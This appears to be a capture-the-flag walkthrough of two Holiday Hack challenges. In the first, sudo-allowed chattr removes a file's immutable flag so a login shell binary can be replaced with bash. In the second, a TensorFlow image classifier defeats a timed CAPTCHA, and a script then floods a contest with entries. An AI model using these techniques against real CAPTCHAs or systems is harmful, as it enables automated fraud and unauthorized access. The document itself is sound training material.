β–‘β–ˆβ–ˆβ–„β–€β–ˆβ–ˆβ–„β–ˆβ–‘β–‘β–‘β–„β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ–‘β–‘β–‘β–‘β–€β–€β–€β–€β–€β–‘β–‘β–‘β–‘β–ˆβ–ˆβ–‘β–‘
β–‘β–‘β–€β–ˆβ–ˆβ–„β–€β–ˆβ–ˆβ–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–€β–‘β–ˆβ–ˆβ–€β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–€β–ˆβ–ˆβ–‘
β–‘β–‘β–‘β–‘β–€β–ˆβ–ˆβ–ˆβ–ˆβ–‘β–€β–‘β–‘β–‘β–‘β–„β–‘β–‘β–‘β–ˆβ–ˆβ–‘β–‘β–‘β–„β–ˆβ–‘β–‘β–‘β–‘β–„β–‘β–„β–ˆβ–‘β–‘β–ˆβ–ˆβ–‘
β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–€β–ˆβ–‘β–‘β–‘β–‘β–„β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ–‘β–‘β–‘β–‘β–„β–‘β–‘β–‘β–„β–‘β–‘β–„β–‘β–‘β–‘β–ˆβ–ˆβ–‘
β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–„β–ˆβ–„β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–€β–„β–‘β–‘β–€β–€β–€β–€β–€β–€β–€β–€β–‘β–‘β–„β–€β–‘β–‘
β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–€β–€β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–€β–€β–€β–€β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–€β–‘β–‘β–‘β–‘
β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–€β–‘β–‘β–ˆβ–ˆβ–ˆβ–€β–‘β–‘β–‘β–‘β–‘β–‘β–€β–ˆβ–ˆβ–ˆβ–‘β–‘β–€β–ˆβ–ˆβ–€β–‘β–‘β–‘β–‘β–‘β–‘
β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘

nyancat, nyancat
I love that nyancat!
My shell's stuffed inside one
Whatcha' think about that?

Sadly now, the day's gone
Things to do!  Without one...
I'll miss that nyancat
Run commands, win, and done!

Log in as the user alabaster_snowball with a password of Password2, and land in a Bash prompt.

Target Credentials:

username: alabaster_snowball
password: Password2
elf@5d7be8ae3e11:~$

Hey it’s nyan cat - that’s great haha! So, using the provided credentials for Alabaster, let’s log in and see what happens.

elf@dfab2664ba73:~$ su alabaster_snowball
Password:

Hahaha, that’s great! Funny for us, but bad for Alabaster. Alright, let’s help this poor guy fix this issue.

After exiting this shell, let’s use Alabaster’s hint to see what /etc/passwd is set to for his user account.

elf@ba16afd01a1b:~$ cat /etc/passwd  
root:x:0:0:root:/root:/bin/bash  
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin  
bin:x:2:2:bin:/bin:/usr/sbin/nologin  
sys:x:3:3:sys:/dev:/usr/sbin/nologin  
sync:x:4:65534:sync:/bin:/bin/sync  
games:x:5:60:games:/usr/games:/usr/sbin/nologin  
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin  
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin  
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin  
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin  
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin  
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin  
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin  
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin  
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin  
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin  
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin  
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin  
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin  
elf:x:1000:1000::/home/elf:/bin/bash  
alabaster_snowball:x:1001:1001::/home/alabaster_snowball:/bin/nsh
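Each /etc/passwd entry is made of seven colon-separated fields, with the login shell in the last one. As a small illustration of reading that field programmatically, here is a sketch that parses a couple of the lines shown above; the login_shell helper is a name I made up for this example.

```python
def login_shell(passwd_text, user):
    """Return the login shell (7th field) for a user, or None if not found."""
    for line in passwd_text.splitlines():
        fields = line.strip().split(":")
        if len(fields) == 7 and fields[0] == user:
            return fields[6]
    return None

# Two entries copied from the output above
sample = """elf:x:1000:1000::/home/elf:/bin/bash
alabaster_snowball:x:1001:1001::/home/alabaster_snowball:/bin/nsh"""

print(login_shell(sample, "elf"))
print(login_shell(sample, "alabaster_snowball"))
```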

Right away we can see that his shell upon login is set to /bin/nsh, which isn’t a standard Linux shell. Okay, well Alabaster also mentioned something about using sudo -l which will list the allowed (and forbidden) sudo commands for the invoking user, so let’s run that and see what we get.

elf@5d7be8ae3e11:~$ sudo -l
Matching Defaults entries for elf on 5d7be8ae3e11:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User elf may run the following commands on 5d7be8ae3e11:
    (root) NOPASSWD: /usr/bin/chattr

After executing the command, we see that we can run the /usr/bin/chattr binary as root via sudo with no password. Basically, the chattr command is used to change file attributes on a Linux file system.

These file attributes are in a specific symbolic mode format such as +-=[acdeijstuADST].

The letters acdeijstuADST select the new attributes for the files: append only (a), compressed (c), no dump (d), extent format (e), immutable (i), data journalling (j), secure deletion (s), no tail-merging (t), undeletable (u), no atime updates (A), synchronous directory updates (D), synchronous updates (S), and top of directory hierarchy (T).

So let’s see what sort of attributes are set for the /bin/nsh binary by using the lsattr command, which will list the file attributes of a specific file.

elf@5d7be8ae3e11:~$ lsattr /bin/nsh
----i---------e---- /bin/nsh

If you read the manual pages for these commands, then you will learn right away that the immutable attribute is set for this file. This attribute prevents anyone - even a root user - from deleting or modifying a file.
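If the flag string from lsattr is hard to read, it can be decoded with a simple lookup table. The sketch below uses only the letter meanings listed above; the decode_flags helper is a hypothetical name for illustration, and any letter not in the list is reported as unknown rather than guessed.

```python
# Attribute letters and meanings as listed above
ATTRS = {
    "a": "append only", "c": "compressed", "d": "no dump",
    "e": "extent format", "i": "immutable", "j": "data journalling",
    "s": "secure deletion", "t": "no tail-merging", "u": "undeletable",
    "A": "no atime updates", "D": "synchronous directory updates",
    "S": "synchronous updates", "T": "top of directory hierarchy",
}

def decode_flags(flags):
    """Translate an lsattr flag string into a list of attribute names."""
    return [ATTRS.get(ch, "unknown (" + ch + ")") for ch in flags if ch != "-"]

print(decode_flags("----i---------e----"))
```

For the /bin/nsh output above, this reports the immutable and extent format attributes.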

We can test this theory by trying to overwrite the data in that binary, as such.

elf@5d7be8ae3e11:~$ echo "test" > /bin/nsh 
-bash: /bin/nsh: Operation not permitted

Alright, well since we can run the chattr command with root permissions, let’s remove the immutable attribute from the file, and overwrite the binary with the bash shell.

elf@5d7be8ae3e11:~$ sudo /usr/bin/chattr -i /bin/nsh
elf@5d7be8ae3e11:~$ lsattr /bin/nsh
--------------e---- /bin/nsh
elf@5d7be8ae3e11:~$ cat /bin/bash > /bin/nsh

Nice, it worked! There’s only one way to see if everything worked well, and that’s to log in with Alabaster’s account again.

elf@5d7be8ae3e11:~$ su alabaster_snowball
Password:  
Loading, please wait......

You did it! Congratulations!

And there we have it, we finished the terminal challenge!

Bypassing the Frido Sleigh CAPTEHA

Upon successfully completing the Nyanshell CranPi we can talk to Alabaster again for more hints that will allow us to complete the next objective.

For this objective we need to help Krampus beat the Frido Sleigh contest. Thanks to Alabaster, we learn that we can use machine learning to beat the CAPTEHA for the challenge, so let’s access the contest page and see what we have to work with.

Cool, so there’s just basic information that we need to fill out, and at the end we have a CAPTEHA challenge. Let’s click on it to see what we have.

Oh crap… That’s a lot of images we need to select, and we only have 5 seconds to do it! How the heck can we complete this?

Well, if we remember our talk with Krampus, he mentioned that he’s already cataloged 12,000 images and decoded the API interface for this challenge.

So, let’s download those files and see what we have to work with.

root@kali:~/HH/frido_sleigh# wget https://downloads.elfu.org/capteha_images.tar.gz
root@kali:~/HH/frido_sleigh# wget https://downloads.elfu.org/capteha_api.py
root@kali:~/HH/frido_sleigh# ls
capteha_api.py  capteha_images.tar.gz
root@kali:~/HH/frido_sleigh# mkdir capteha_images
root@kali:~/HH/frido_sleigh# tar -xzvf capteha_images.tar.gz -C capteha_images/
root@kali:~/HH/frido_sleigh# ls -la capteha_images/
total 760
drwxr-xr-x 8 root root   4096 Dec 24 15:14  .
drwxr-xr-x 3 root root   4096 Dec 24 15:15  ..
drwxrwxr-x 2 1000 1000 135168 Nov 26 14:40 'Candy Canes'
drwxrwxr-x 2 1000 1000 135168 Nov 26 14:40 'Christmas Trees'
drwxrwxr-x 2 1000 1000 126976 Nov 26 14:40  Ornaments
drwxrwxr-x 2 1000 1000 122880 Nov 26 14:40  Presents
drwxrwxr-x 2 1000 1000 126976 Nov 26 14:40 'Santa Hats'
drwxrwxr-x 2 1000 1000 122880 Nov 26 14:40  Stockings

Huh, so we got folders for the different images. So what?

Well, if we look back to the hint Alabaster gave us, we learn about some Machine Learning Use Cases for Cyber Security. In this video, Chris Davis explains how we can use machine learning for image recognition, and there is also a hint on beating captcha using this.

Thankfully, Chris provides us a link to his Image Recognition Using TensorFlow Machine Learning Demo GitHub repository.

In this repository we have information on TensorFlow, along with installation instructions on how to set up and train a machine learning model to tell apples from bananas - which he demonstrated in his video.

Using the instructions in the GitHub repository, let’s clone the repository and install everything that we need.

Once that’s installed, let’s start by looking at the capteha_api.py file that was provided to us by Krampus.

#!/usr/bin/env python3
# Fridosleigh.com CAPTEHA API - Made by Krampus Hollyfeld
import requests
import json
import sys

def main():
    yourREALemailAddress = "[email protected]"

    # Creating a session to handle cookies
    s = requests.Session()
    url = "https://fridosleigh.com/"

    json_resp = json.loads(s.get("{}api/capteha/request".format(url)).text)
    b64_images = json_resp['images'] # A list of dictionaries eaching containing the keys 'base64' and 'uuid'
    challenge_image_type = json_resp['select_type'].split(',') # The Image types the CAPTEHA Challenge is looking for.
    challenge_image_types = [challenge_image_type[0].strip(), challenge_image_type[1].strip(), challenge_image_type[2].replace(' and ','').strip()] # cleaning and formatting
    
    '''
    MISSING IMAGE PROCESSING AND ML IMAGE PREDICTION CODE GOES HERE
    '''
    
    # This should be JUST a csv list image uuids ML predicted to match the challenge_image_type .
    final_answer = ','.join( [ img['uuid'] for img in b64_images ] )
    
    json_resp = json.loads(s.post("{}api/capteha/submit".format(url), data={'answer':final_answer}).text)
    if not json_resp['request']:
        # If it fails just run again. ML might get one wrong occasionally
        print('FAILED MACHINE LEARNING GUESS')
        print('--------------------\nOur ML Guess:\n--------------------\n{}'.format(final_answer))
        print('--------------------\nServer Response:\n--------------------\n{}'.format(json_resp['data']))
        sys.exit(1)

    print('CAPTEHA Solved!')
    # If we get to here, we are successful and can submit a bunch of entries till we win
    userinfo = {
        'name':'Krampus Hollyfeld',
        'email':yourREALemailAddress,
        'age':180,
        'about':"Cause they're so flippin yummy!",
        'favorites':'thickmints'
    }
    # If we win the once-per minute drawing, it will tell us we were emailed. 
    # Should be no more than 200 times before we win. If more, somethings wrong.
    entry_response = ''
    entry_count = 1
    while yourREALemailAddress not in entry_response and entry_count < 200:
        print('Submitting lots of entries until we win the contest! Entry #{}'.format(entry_count))
        entry_response = s.post("{}api/entry".format(url), data=userinfo).text
        entry_count += 1
    print(entry_response)

if __name__ == "__main__":
    main()

It seems that the code needed to submit all the data to the API has already been completed for us. All that we really need to do is to add the machine learning and image processing code for the CAPTEHA.
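One detail worth noting in Krampus’ script is how it cleans up the select_type string into a list of three image types. The sketch below repeats that same split, strip, and replace logic on a sample string. The sample value is an assumption on my part about what the API returns (a comma-separated list ending in "and"); the real response may be worded differently.

```python
def parse_select_type(select_type):
    """Mirror the cleanup done in capteha_api.py for the three requested types."""
    parts = select_type.split(",")
    return [
        parts[0].strip(),
        parts[1].strip(),
        parts[2].replace(" and ", "").strip(),
    ]

# Hypothetical example of a select_type value
sample = "Candy Canes, Christmas Trees, and Ornaments"
print(parse_select_type(sample))
```

The resulting names line up with the folder names in the image archive, which is what lets us compare them against the labels our model predicts.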

But first, we need to figure out how we can process all the image data that is stored in the b64_images list.

If we look over the Python code, we can see that the b64_images variable stores a list of dictionaries, each holding the base64 data of an image along with a UUID (universally unique identifier). A single entry looks like the following when we print it to the screen:

{u'base64': u'iVBORw0KGgoA...', u'uuid': u'b472b8dd-e584-11e9-97c1-309c23aaf0ac'}

So let’s attempt to take this data, and save it as an image file to disk. This way we can validate if we are actually getting images.

To do so, we will take the base64 image data by using b64_images[0]["base64"] and save that to a temporary file under its corresponding UUID by using b64_images[0]["uuid"].

So, we can add the following code to the machine learning section of our script:

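import base64

# Decode the first image and write it to disk under its UUID
# (assumes the /tmp/imgs/ directory already exists)
img_data = base64.b64decode(b64_images[0]["base64"])
with open("/tmp/imgs/" + b64_images[0]["uuid"], "wb") as file:
    file.write(img_data)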

If we run that, we should see that our first image is saved successfully!

Now we can add code that will save the full list of images by looping over all the entries and writing each image to the folder.

# Each entry is a dictionary with 'base64' and 'uuid' keys
for img in b64_images:
    img_data = base64.b64decode(img["base64"])
    with open("/tmp/imgs/" + img["uuid"], "wb") as file:
        file.write(img_data)

If we run that, we should see that all of our images are saved successfully!

Cool, but the issue we have here is that we only have 5 seconds to do this, so we need to process the data on the fly instead of saving data to disk.
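As a rough idea of what "on the fly" means here, the images can be decoded straight into a dictionary in memory, keyed by UUID, with no files involved. The sketch below is my own illustration: decode_images is a hypothetical helper, and the sample entry contains only the 8-byte PNG signature (base64 "iVBORw0KGgo=") rather than a real challenge image.

```python
import base64

# Every PNG file starts with these eight bytes
PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"

def decode_images(b64_images):
    """Map each UUID to its decoded image bytes, entirely in memory."""
    return {img["uuid"]: base64.b64decode(img["base64"]) for img in b64_images}

# Hypothetical entry: just the PNG signature, not a full image
sample = [{"base64": "iVBORw0KGgo=", "uuid": "hypothetical-uuid"}]
decoded = decode_images(sample)
print(decoded["hypothetical-uuid"].startswith(PNG_SIGNATURE))
```

Checking for the PNG signature is a cheap way to confirm the data really is a PNG before handing the bytes to the prediction code.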

Okay, well before we do that, we need to figure out how the image prediction algorithm is reading the image file. So, let’s open the predict_images_using_trained_model.py file and see what it does.

#!/usr/bin/python3
# Image Recognition Using Tensorflow Exmaple.
# Code based on example at:
# https://raw.githubusercontent.com/tensorflow/tensorflow/master/tensorflow/examples/label_image/label_image.py
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
tf.logging.set_verbosity(tf.logging.ERROR)
import numpy as np
import threading
import queue
import time
import sys

# sudo apt install python3-pip
# sudo python3 -m pip install --upgrade pip
# sudo python3 -m pip install --upgrade setuptools
# sudo python3 -m pip install --upgrade tensorflow==1.15

def load_labels(label_file):
    label = []
    proto_as_ascii_lines = tf.gfile.GFile(label_file).readlines()
    for l in proto_as_ascii_lines:
        label.append(l.rstrip())
    return label

def predict_image(q, sess, graph, image_bytes, img_full_path, labels, input_operation, output_operation):
    image = read_tensor_from_image_bytes(image_bytes)
    results = sess.run(output_operation.outputs[0], {
        input_operation.outputs[0]: image
    })
    results = np.squeeze(results)
    prediction = results.argsort()[-5:][::-1][0]
    q.put( {'img_full_path':img_full_path, 'prediction':labels[prediction].title(), 'percent':results[prediction]} )

def load_graph(model_file):
    graph = tf.Graph()
    graph_def = tf.GraphDef()
    with open(model_file, "rb") as f:
        graph_def.ParseFromString(f.read())
    with graph.as_default():
        tf.import_graph_def(graph_def)
    return graph

def read_tensor_from_image_bytes(imagebytes, input_height=299, input_width=299, input_mean=0, input_std=255):
    image_reader = tf.image.decode_png( imagebytes, channels=3, name="png_reader")
    float_caster = tf.cast(image_reader, tf.float32)
    dims_expander = tf.expand_dims(float_caster, 0)
    resized = tf.image.resize_bilinear(dims_expander, [input_height, input_width])
    normalized = tf.divide(tf.subtract(resized, [input_mean]), [input_std])
    sess = tf.compat.v1.Session()
    result = sess.run(normalized)
    return result

def main():
    # Loading the Trained Machine Learning Model created from running retrain.py on the training_images directory
    graph = load_graph('/tmp/retrain_tmp/output_graph.pb')
    labels = load_labels("/tmp/retrain_tmp/output_labels.txt")

    # Load up our session
    input_operation = graph.get_operation_by_name("import/Placeholder")
    output_operation = graph.get_operation_by_name("import/final_result")
    sess = tf.compat.v1.Session(graph=graph)

    # Can use queues and threading to spead up the processing
    q = queue.Queue()
    unknown_images_dir = 'unknown_images'
    unknown_images = os.listdir(unknown_images_dir)
    
    #Going to interate over each of our images.
    for image in unknown_images:
        img_full_path = '{}/{}'.format(unknown_images_dir, image)
        
        print('Processing Image {}'.format(img_full_path))
        # We don't want to process too many images at once. 10 threads max
        while len(threading.enumerate()) > 10:
            time.sleep(0.0001)

        #predict_image function is expecting png image bytes so we read image as 'rb' to get a bytes object
        image_bytes = open(img_full_path,'rb').read()
        threading.Thread(target=predict_image, args=(q, sess, graph, image_bytes, img_full_path, labels, input_operation, output_operation)).start()
    
    print('Waiting For Threads to Finish...')
    while q.qsize() < len(unknown_images):
        time.sleep(0.001)
    
    #getting a list of all threads returned results
    prediction_results = [q.get() for x in range(q.qsize())]
    
    #do something with our results... Like print them to the screen.
    for prediction in prediction_results:
        print('TensorFlow Predicted {img_full_path} is a {prediction} with {percent:.2%} Accuracy'.format(**prediction))

if __name__ == "__main__":
    main()

If we look toward the end of the main function, we see the following line:

image_bytes =  open(img_full_path,'rb').read()

This line takes the path of the image file, opens it in binary mode, and reads its raw bytes. So instead of saving each image to disk first, we can reuse the code we wrote previously and pass the base64-decoded data straight into the image_bytes variable.
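To see why the swap is safe, here is a minimal sketch showing that base64-decoding an API image yields the same bytes that reading the file in 'rb' mode would. The sample entry and its contents are made up for illustration; only the 'base64' and 'uuid' key names are taken from the CAPTEHA API response.

```python
import base64

# Stand-in for the bytes that open(path, 'rb').read() would return for a PNG.
file_bytes = b"\x89PNG\r\n\x1a\n" + b"fake image payload"

# Hypothetical API entry; only the key names come from the CAPTEHA response.
api_image = {
    "base64": base64.b64encode(file_bytes).decode("ascii"),
    "uuid": "00000000-0000-0000-0000-000000000000",
}

# Decoding gives back the exact bytes, so they can be passed as image_bytes.
image_bytes = base64.b64decode(api_image["base64"])
print(image_bytes == file_bytes)
```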

So for this to happen, we will need to update the logic of the predict_images_using_trained_model.py script.

The first thing we will do is remove lines 67, 68, and 74 from the main function, since we won’t be accessing an image directory.

*** REMOVE THESE LINES ***
unknown_images_dir = 'unknown_images'
unknown_images = os.listdir(unknown_images_dir)
print('Processing Image {}'.format(img_full_path))

Next in the section where we will iterate over each of our images, we are going to rewrite that part with our previously written code, which will look like so.

# Going to iterate over each of our images.
print('Processing Images...')
for image in b64_images:
    # Each entry is a dictionary with the keys 'base64' and 'uuid'
    img_data = base64.b64decode(image["base64"])
    img_uuid = image["uuid"]

Next, in lines 79-81 where the predict_image function is expecting png image bytes, we will rewrite that to pass our previous image data and UUID, instead of the file paths.

threading.Thread(target=predict_image, args=(q, sess, graph, img_data, img_uuid, labels, input_operation, output_operation)).start()

Finally, in lines 90-92 where we do something with our results, we will rewrite the loop so that we grab each predicted image type and validate it against the challenge_image_types list, which holds the image types the CAPTEHA expects. If the predicted type matches one of the challenge types, we append the image’s UUID to our valid_types list.

The code will look like so.

valid_types = []
for prediction in prediction_results:
    prediction_img_type = ('{prediction}').format(**prediction)
    prediction_uuid = ('{img_full_path}').format(**prediction)
    if prediction_img_type in challenge_image_types:
        valid_types.append(prediction_uuid)

After all the modifications are done, the predict_images_using_trained_model.py main function should look like the one below:

def main():
    # Loading the Trained Machine Learning Model created from running retrain.py on the training_images directory
    graph = load_graph('/tmp/retrain_tmp/output_graph.pb')
    labels = load_labels("/tmp/retrain_tmp/output_labels.txt")

    # Load up our session
    input_operation = graph.get_operation_by_name("import/Placeholder")
    output_operation = graph.get_operation_by_name("import/final_result")
    sess = tf.compat.v1.Session(graph=graph)

    # Can use queues and threading to speed up the processing
    q = queue.Queue()
    
    # Going to iterate over each of our images.
    print('Processing Images...')
    for image in b64_images:
        img_data = base64.b64decode(image["base64"])
        img_uuid = image["uuid"]

        # We don't want to process too many images at once. 10 threads max
        while len(threading.enumerate()) > 10:
            time.sleep(0.0001)

        # predict_image expects png image bytes, so we pass the base64-decoded data
        threading.Thread(target=predict_image, args=(q, sess, graph, img_data, img_uuid, labels, input_operation, output_operation)).start()

    print('Waiting For Threads to Finish...')
    while q.qsize() < len(b64_images):
        time.sleep(0.001)

    # getting a list of all threads returned results
    prediction_results = [q.get() for x in range(q.qsize())]

    # Collect the UUIDs of the images whose predicted type matches the challenge.
    valid_types = []
    for prediction in prediction_results:
        prediction_img_type = ('{prediction}').format(**prediction)
        prediction_uuid = ('{img_full_path}').format(**prediction)
        if prediction_img_type in challenge_image_types:
            valid_types.append(prediction_uuid)
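
As an aside, the polling loops around threading.enumerate() and q.qsize() work, but the standard library's concurrent.futures module can express the same "at most N workers, then wait for everything" idea more directly. The following is a minimal sketch of that alternative, not the script used in this post. The classify function is a hypothetical stand-in for predict_image, and the sample labels are made up, so the example runs without TensorFlow.

```python
from concurrent.futures import ThreadPoolExecutor


def classify(image):
    # Hypothetical stand-in for predict_image: returns a result dict
    # instead of pushing it onto a queue.
    return {"img_full_path": image["uuid"], "prediction": image["label"].title()}


def predict_all(images, max_workers=10):
    # The pool caps concurrency at max_workers, and map() yields results in
    # input order once they are ready, so no sleep-based polling is needed.
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        return list(pool.map(classify, images))


# Made-up sample data for illustration only.
sample = [
    {"uuid": "uuid-1", "label": "candy canes"},
    {"uuid": "uuid-2", "label": "stockings"},
]
results = predict_all(sample)
print(results)
```

Because map() preserves input order, the results line up with the submitted images, which the queue-based version does not guarantee.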

Once we have that done, we can integrate our machine learning predict_images_using_trained_model.py script into our capteha_api.py script.

Note: There are some additional changes I made, see if you can spot them and figure out what they do! 😊

Also, make sure you change the yourREALemailAddress variable to your actual email so you can obtain the code!

The final code for this will look like so:

#!/usr/bin/env python3
# Fridosleigh.com CAPTEHA API - Made by Krampus Hollyfeld
import requests
import json
import sys
import base64
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
tf.logging.set_verbosity(tf.logging.ERROR)
import numpy as np
import threading
import queue
import time

# Predict Images Script
def load_labels(label_file):
    label = []
    proto_as_ascii_lines = tf.gfile.GFile(label_file).readlines()
    for l in proto_as_ascii_lines:
        label.append(l.rstrip())
    return label

def predict_image(q, sess, graph, image_bytes, img_full_path, labels, input_operation, output_operation):
    image = read_tensor_from_image_bytes(image_bytes)
    results = sess.run(output_operation.outputs[0], {
        input_operation.outputs[0]: image
    })
    results = np.squeeze(results)
    prediction = results.argsort()[-5:][::-1][0]
    q.put( {'img_full_path':img_full_path, 'prediction':labels[prediction].title(), 'percent':results[prediction]} )

def load_graph(model_file):
    graph = tf.Graph()
    graph_def = tf.GraphDef()
    with open(model_file, "rb") as f:
        graph_def.ParseFromString(f.read())
    with graph.as_default():
        tf.import_graph_def(graph_def)
    return graph

def read_tensor_from_image_bytes(imagebytes, input_height=299, input_width=299, input_mean=0, input_std=255):
    image_reader = tf.image.decode_png( imagebytes, channels=3, name="png_reader")
    float_caster = tf.cast(image_reader, tf.float32)
    dims_expander = tf.expand_dims(float_caster, 0)
    resized = tf.image.resize_bilinear(dims_expander, [input_height, input_width])
    normalized = tf.divide(tf.subtract(resized, [input_mean]), [input_std])
    sess = tf.compat.v1.Session()
    result = sess.run(normalized)
    return result

###

def main():

    # Predictive Images Script
    # Loading the Trained Machine Learning Model created from running retrain.py on the training_images directory
    graph = load_graph('/tmp/retrain_tmp/output_graph.pb')
    labels = load_labels("/tmp/retrain_tmp/output_labels.txt")

    # Load up our session
    input_operation = graph.get_operation_by_name("import/Placeholder")
    output_operation = graph.get_operation_by_name("import/final_result")
    sess = tf.compat.v1.Session(graph=graph)
    
    # Can use queues and threading to speed up the processing
    q = queue.Queue()

    # Email address to get key
    yourREALemailAddress = "[email protected]"

    for numThreads in range(10, 50, 4):
        # Creating a session to handle cookies
        s = requests.Session()
        url = "https://fridosleigh.com/"

        json_resp = json.loads(s.get("{}api/capteha/request".format(url)).text)
        b64_images = json_resp['images']  # A list of dictionaries each containing the keys 'base64' and 'uuid'
        challenge_image_type = json_resp['select_type'].split(',')  # The Image types the CAPTEHA Challenge is looking for.
        challenge_image_types = [challenge_image_type[0].strip(), challenge_image_type[1].strip(), challenge_image_type[2].replace(' and ','').strip()] # cleaning and formatting

        # Going to iterate over each of our images.
        print('Processing Images...')
        for image in b64_images:
            img_data = base64.b64decode(image["base64"])
            img_uuid = image["uuid"]
            
            # We don't want to process too many images at once. numThreads threads max
            while len(threading.enumerate()) > numThreads:
                time.sleep(0.0001)

            #predict_image function is expecting png image bytes so we read image as 'rb' to get a bytes object
            threading.Thread(target=predict_image, args=(q, sess, graph, img_data, img_uuid, labels, input_operation, output_operation)).start()
        
        print('Waiting For Threads to Finish...')
        while q.qsize() < len(b64_images):
            time.sleep(0.001)
        
        #getting a list of all threads returned results
        prediction_results = [q.get() for x in range(q.qsize())]
        
        #do something with our results... Like print them to the screen.
        valid_types = []
        for prediction in prediction_results:
            prediction_img_type = ('{prediction}').format(**prediction)
            prediction_uuid = ('{img_full_path}').format(**prediction)
            if prediction_img_type in challenge_image_types:
                valid_types.append(prediction_uuid)

        ### END Prediction ####
        
        # This should be JUST a csv list image uuids ML predicted to match the challenge_image_type .
        final_answer = ','.join(valid_types)
        
        json_resp = json.loads(s.post("{}api/capteha/submit".format(url), data={'answer':final_answer}).text)
        if not json_resp['request']:
            # If it fails just run again. ML might get one wrong occasionally
            print('FAILED MACHINE LEARNING GUESS')
            print('--------------------\nOur ML Guess:\n--------------------\n{}'.format(final_answer))
            print('--------------------\nServer Response:\n--------------------\n{}'.format(json_resp['data']))
            print("Failed! Threads: "+str(numThreads))
        else:
            print('CAPTEHA Solved!')
            # If we get to here, we are successful and can submit a bunch of entries till we win
            userinfo = {
                'name':'Krampus Hollyfeld',
                'email':yourREALemailAddress,
                'age':180,
                'about':"Cause they're so flippin yummy!",
                'favorites':'thickmints'
            }
            # If we win the once-per minute drawing, it will tell us we were emailed. 
            # Should be no more than 200 times before we win. If more, somethings wrong.
            entry_response = ''
            entry_count = 1
            while yourREALemailAddress not in entry_response and entry_count < 200:
                print('Submitting lots of entries until we win the contest! Entry #{}'.format(entry_count))
                entry_response = s.post("{}api/entry".format(url), data=userinfo).text
                entry_count += 1
                print(entry_response)
            break


if __name__ == "__main__":
    main()
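
The cleanup of select_type in the script above assumes that the challenge always names exactly three image types. As a hedged sketch, the helpers below parse a variable number of types and build the comma-separated answer. The example string and the function names are assumptions: its format is inferred from the split and replace calls in the script, not copied from a real API response.

```python
import re


def parse_challenge_types(select_type):
    # Split on commas (optionally followed by "and") or on a bare " and ".
    parts = re.split(r"\s*,\s*(?:and\s+)?|\s+and\s+", select_type)
    return [p.strip() for p in parts if p.strip()]


def matching_uuids(predictions, wanted_types):
    # Keep the UUID of every prediction whose type is one the challenge wants.
    wanted = set(wanted_types)
    return [p["img_full_path"] for p in predictions if p["prediction"] in wanted]


# Assumed format of json_resp['select_type'], for illustration only.
types = parse_challenge_types("Candy Canes, Ornaments, and Stockings")

# Made-up predictions in the same shape predict_image puts on the queue.
predictions = [
    {"img_full_path": "uuid-1", "prediction": "Candy Canes"},
    {"img_full_path": "uuid-2", "prediction": "Presents"},
    {"img_full_path": "uuid-3", "prediction": "Stockings"},
]
answer = ",".join(matching_uuids(predictions, types))
print(types)
print(answer)
```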

Since this script requires a lot of resources, I will be using a Deep Learning AMI in AWS.

For those that don’t have AWS, you can use Google Colaboratory, a free Jupyter notebook environment that requires no setup and runs entirely in the cloud. You can write and execute code, save and share your analyses, and access powerful computing resources, all for free from your browser.

Within the AMI, we activate the TensorFlow environment, download all the files again, and copy over our code. Once we have everything, we run the retrain.py training script against the images provided to us by Krampus.

This should take about 15-20 minutes, so go grab a coffee! ☕

[ec2-user@ip-172-31-36-164 ~]$ source activate tensorflow_p36
[ec2-user@ip-172-31-36-164 ~]$ cd frido_sleigh/
[ec2-user@ip-172-31-36-164:~/frido_sleigh$ python3 img_rec_tf_ml_demo/retrain.py --image_dir capteha_images/

Once our TensorFlow model is trained, we can run our capteha_api.py script and see if we can complete the challenge.

(tensorflow_p36) [ec2-user@ip-172-31-36-164 frido_sleigh]$ python3 capteha_api.py

Processing Images...
Waiting For Threads to Finish...
FAILED MACHINE LEARNING GUESS
--------------------
Our ML Guess:
--------------------
